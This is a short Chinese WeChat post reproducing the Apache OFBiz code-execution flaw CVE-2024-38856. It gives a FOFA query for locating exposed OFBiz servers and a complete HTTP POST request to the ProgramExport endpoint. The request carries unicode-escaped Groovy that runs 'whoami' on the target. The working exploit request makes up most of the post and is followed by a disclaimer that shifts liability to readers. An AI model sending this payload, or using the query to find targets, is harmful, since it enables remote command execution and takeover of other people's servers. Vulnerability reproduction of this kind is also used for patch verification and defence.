漏洞复现| Apache OFBiz 授权不当致代码执行漏洞(CVE-2024-38856)

原创 小白菜安全 小白菜安全 2024-08-07 10:15

漏洞描述

Apache OFBiz 因配置不当存在命令执行漏洞，该漏洞源于org.apache.ofbiz.webapp.control.ControlFilter类对路径，通过/webtools/control/ProgramExport接口的编程导出功能执行任意Groovy代码获取系统权限

资产信息

FOFA：app=”Apache_OFBiz”

漏洞复现

执行whoami

POST /webtools/control/main/ProgramExport HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 284

groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0077\u0068\u006f\u0061\u006d\u0069\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

漏洞回显：

免责声明

该公众号主要是分享互联网上公开的一些漏洞poc和工具，
利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本公众号及作者不为此承担任何责任，一旦造成后果请自行承担！如果本公众号分享导致的侵权行为请告知，我们会立即删除并道歉。